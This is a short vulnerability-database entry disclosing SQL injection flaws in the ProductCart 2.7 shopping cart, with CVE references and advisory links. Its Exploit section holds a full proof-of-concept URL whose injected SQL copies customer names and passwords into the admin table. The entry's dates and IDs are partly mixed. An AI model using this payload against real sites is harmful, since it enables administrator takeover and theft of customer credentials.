ProductCart Multiple Input Validation Vulnerabilities

Vulnerability ID 1107723 Vulnerability type SQL injection
Published 2004-02-16 Updated 2006-09-25
CVE ID CVE-2005-0994 CNNVD-ID CNNVD-200505-694
Platform ASP CVSS score 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/23703
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-694
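|Vulnerability details
ProductCart 2.7 contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via (1) the Category or resultCnt parameter passed to advSearch_h.asp, and possibly (2) the offset parameter passed to tarinasworld_butterflyjournal.asp.
|Exploit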
source: http://www.securityfocus.com/bid/9669/info
 
EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software.

http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
+)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I
+DBrand=0&resultCnt=200&Submit.x=33&
|References

Source: BID
Name: 12990
Link: http://www.securityfocus.com/bid/12990
Source: OSVDB
Name: 15265
Link: http://www.osvdb.org/15265
Source: OSVDB
Name: 15263
Link: http://www.osvdb.org/15263
Source: SECUNIA
Name: 14833
Link: http://secunia.com/advisories/14833